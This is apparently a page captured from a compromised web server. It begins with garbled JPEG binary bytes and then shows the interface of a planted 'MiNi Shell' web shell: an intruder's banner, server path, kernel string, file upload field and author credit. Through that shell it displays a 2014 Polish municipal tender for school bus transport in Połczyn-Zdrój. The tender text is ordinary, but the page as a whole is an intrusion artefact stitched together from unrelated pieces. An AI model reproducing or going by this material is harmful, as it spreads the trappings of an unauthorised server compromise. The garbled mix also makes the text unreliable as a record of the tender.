JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140708/228634-N-2014.html

<p class="kh_header"><b>Połczyn-Zdrój: Przedmiotem zamówienia jest dowożenie i odwożenie dzieci i uczniów do i ze 
szkół podstawowych, gimnazjów i przedszkoli z terenu gminy Połczyn-Zdrój w komunikacji regularnej na podstawie biletów miesięcznych w okresie od 
01.09.2014r. do 30.06.2016r.</b><br>
<b>Numer ogłoszenia: 228634 - 2014; data zamieszczenia: 08.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Połczyn-Zdrój , Plac Wolności 3-4, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 94 3666100, faks 94 3666105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polczyn-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dowożenie i odwożenie dzieci i uczniów do i ze 
szkół podstawowych, gimnazjów i przedszkoli z terenu gminy Połczyn-Zdrój w komunikacji regularnej na podstawie biletów miesięcznych w okresie od 
01.09.2014r. do 30.06.2016r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowożenie i odwożenie dzieci i uczniów do i ze 
szkół podstawowych, gimnazjów i przedszkoli z terenu gminy Połczyn-Zdrój w komunikacji regularnej na podstawie biletów miesięcznych w okresie od 
01.09.2014r. do 30.06.2016r.
        W szczególności przedmiotem zamówienia jest wykonanie usługi polegającej na dowozie: dzieci pięcio- i sześcioletnich z terenu Gminy Połczyn-Zdrój mających obowiązek rocznego przygotowania przedszkolnego do Przedszkola Samorządowego Nr 1 w Połczynie-Zdroju oraz Przedszkola Samorządowego w Redle (wsiadanie i wysiadanie przy budynku Przedszkola Samorządowego Nr 1 w Połczynie-Zdroju i budynku Przedszkola Samorządowego w Redle oraz na przystankach autobusowych) - w dni nauki szkolnej - codziennie (oprócz sobót i niedziel zgodnie z organizacją roku szkolnego) z podanych poniżej miejscowości oraz odwozie dzieci do miejsca zamieszkania (wysiadanie na przystankach autobusowych) po zakończeniu zajęć, oraz dzieci i młodzieży (uczniów) z terenu Gminy Połczyn-Zdrój do Publicznej Szkoły Podstawowej Nr 1 w Połczynie-Zdroju, do Gimnazjum Publicznego w Połczynie-Zdroju, do Zespołu Szkół Publicznych w Redle, Publicznej Szkoły Podstawowej w Bolkowie i Publicznej Szkoły Podstawowej w Toporzyku (wsiadanie i wysiadanie przy budynkach szkół oraz na przystankach autobusowych) - w dni nauki szkolnej - codziennie (oprócz sobót i niedziel zgodnie z organizacją roku szkolnego) oraz odwozie uczniów do miejsca zamieszkania (wysiadanie na przystankach autobusowych) po zakończeniu zajęć szkolnych i pozalekcyjnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.17.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie 
wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych 00/100).
            Wykonawca wnosi wadium:
- w pieniądzu, 
Sposób przekazania: - na konto Zamawiającego PKO BP S.A. o/Drawsko Pom.                            Nr 77 1020 2847 0000 1702 0009 6693
            Przy czym za termin wniesienia wadium w formie przelewu pieniężnego 
            przyjmuje się termin uznania na rachunku Zamawiającego,
      lub w jednej z poniżej podanych form:
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
- w gwarancjach bankowych,
- w gwarancjach ubezpieczeniowych, 
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.) 
       Sposób przekazania: oryginał wraz z kopią potwierdzoną za zgodność z 
       oryginałem załączone do oferty przetargowej.

       Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze    
       pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z 
       warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek 
       zastrzeżeń lub gwarancji.
2. Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą 
             wadium zostanie przez zamawiającego wykluczony a jego oferta odrzucona.
3. Wadium musi zostać wniesione przed terminem składania ofert, tj do dnia   
             23.07.2014r., godz. 10:00       
4. W przypadku wnoszenia wadium w formie pieniężnej za termin jego 
            wniesienia zostanie przyjęty termin uznania rachunku  Zamawiającego.
5. Wadium winno być wniesione na czas równy okresowi związania ofertą 
            składana w niniejszym postępowaniu.
6. Wadium wniesione w pieniądzu zamawiający przechowa na rachunku 
            bankowym.
7. Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą 
            wadium zostanie przez zamawiającego wykluczony z postępowania a jego 
            oferta odrzucona.
8. Zamawiający zatrzymuje wadium wraz z odsetkami w sytuacji, gdy:
1)	wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	spowodował, że zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po jego stronie.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po 
             wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z 
             wyjątkiem wykonawcy,którego oferta została wybrana jako najkorzystniejsza.
10.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 
             Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie 
             zamówienia publicznego oraz wniesieniu zabezpieczenia należytego 
             wykonania umowy.
11. Na wniosek wykonawcy, którego oferta zostanie uznana za 
             najkorzystniejszą zamawiający zaliczy wadium wpłacone w pieniądzu na 
             poczet zabezpieczenia należytego wykonania umowy.
12. Jeżeli wadium zostanie wniesione w pieniądzu zamawiający zwróci je 
             wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym 
             było ono przechowywane pomniejszonym o koszty prowadzenia rachunku 
             oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
13. W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić 
             wadium lub dołączyć do oferty upoważnienie do odbioru wadium przez 
             wskazaną osobę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, wykonywał lub wykonuje minimum jedną usługę o charakterze i złożoności porównywalnej z zakresem zadania tj. regularny przewóz uczniów do szkół przez okres co najmniej 10-ciu miesięcy o łącznej wartości nie mniejszej niż 500.000,00 zł.
Należy podać rodzaj usługi, termin i adres oraz wartość wykonania usługi wraz 
z załączeniem dokumentów potwierdzających, że zadanie zostało wykonane 
należycie.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada lub zapewni o możliwości dysponowania koniecznymi 
pojazdami do wykonania przedmiotu zamówienia - własność lub dzierżawa. 
Wykonawca przedstawi wykaz w pełni sprawnych autobusów na każdą trasę, 
które umożliwią przewóz wszystkich dzieci (z miejscami siedzącymi dla 
wszystkich dzieci) na godziny określone w rozkładzie jazdy zgodnie z 
wytyczonymi trasami. Pojazdy w chwili składania oferty muszą być
dopuszczone do ruchu drogowego i posiadać aktualne badania techniczne.
Wykonawca uwzględni obowiązek przejęcia umową dzierżawy 6 szt. 
autobusów dotychczas przewożących dzieci do szkół.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje   
ub będzie dysponował co najmniej 7 kierowcami legitymującymi się kwalifikacjami zawodowymi tj. uprawnieniami do kierowania autobusami i przewozu osób.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada opłacone ubezpieczenie od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na 
kwotę nie mniejszą niż 500.000 zł (słownie: pięćset tysięcy złotych 00/100).
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu (w formie oryginału) 
   zgodnie z art. 24 ustawy Prawo zamówień publicznych wg wzoru stanowiącego 
   załącznik nr 2 do SIWZ.
2. Dokumenty potwierdzające uprawnienie (pełnomocnictwo) osób podpisujących   
    ofertę. Pełnomocnictwo do podpisania oferty winno być dołączone do oferty, o ile 
    nie wynika z innych dokumentów załączonych przez wykonawcę. Pełnomocnictwo 
    winno być załączone w oryginale lub kopii poświadczonej za zgodność z oryginałem 
    przez notariusza.
3. Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ.
4. Wniosek o dzierżawę 6 szt. autobusów szkolnych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust 1 ustawy Pzp Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a) w uzasadnionych przypadkach lub innych okolicznościach niezależnych od
    Zamawiającego lub Wykonawcy konieczna będzie zmiana terminu realizacji
    zamówienia,
b) w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia    
    zmian wynikających z okoliczności, których nie można było przewidzieć w chwili   
    zawarcia umowy,
c) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla
   Zamawiającego, a wynikły one w trakcie realizacji zamówienia,
d) Zamawiający dopuszcza zmiany treści niniejszej umowy w zakresie zmiany cen
   jednostkowych za bilety miesięczne uczniów, podane w formularzu ofertowym,  
   które mogą być podwyższane od 01.01.2015 roku, o średnioroczny wskaźnik  
   inflacji cen towarów i usług konsumpcyjnych za rok poprzedni. 
   Dopuszcza się podniesienie lub obniżenie cen za świadczone usługi przewozowe 
   w zależności wzrostu lub spadku cen paliw płynnych (ON) o więcej niż 5% w 
   stosunku do średniej ceny paliwa obowiązującej na stacjach paliw na terenie  
   Gminy Połczyn-Zdrój w ostatnim dniu w miesiącu poprzedzającym wystawienie  
   przez Wykonawcę faktury za świadczone usługi, o wysokość tego wzrostu.
   Informacje o wzroście lub spadku cen paliw Wykonawca zobowiązany jest  
   przekazać Zamawiającemu do 15 dnia każdego miesiąca poprzedzającego  
   wystawienie przez Zamawiającego zamówienia na bilety. 
   Informacja powyższa musi być przekazana w formie pisemnej.
e) zmiany obowiązującej stawki VAT:
   - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania  
    umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia
    wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez
    Wykonawcę,
   - jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania  
    umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia
    wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia   
    przez Wykonawcę,
f) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy. W takim
   przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy
   czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz     
   udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z    
   umowy planowanymi świadczeniami,

Wszystkie powyższe postanowienia stanowią katalog zmian, na które 
Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do 
wyrażenia takiej zgody.
Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy:
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np.
   zmiana nr rachunku bankowego),
b) zmiany danych tele-adresowych, zmiany osób wskazanych do kontaktów między
    Stronami,
c) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach
    publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polczyn-zdroj.pl/bip/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Połczyn-Zdrój
Urząd Miejski w Połczynie-Zdroju 
Plac Wolności 3-4 
78-320 Połczyn-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2014 godzina 10:00, miejsce: Gmina Połczyn-Zdrój
Urząd Miejski w Połczynie-Zdroju 
Plac Wolności 3-4 
78-320 Połczyn-Zdrój
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com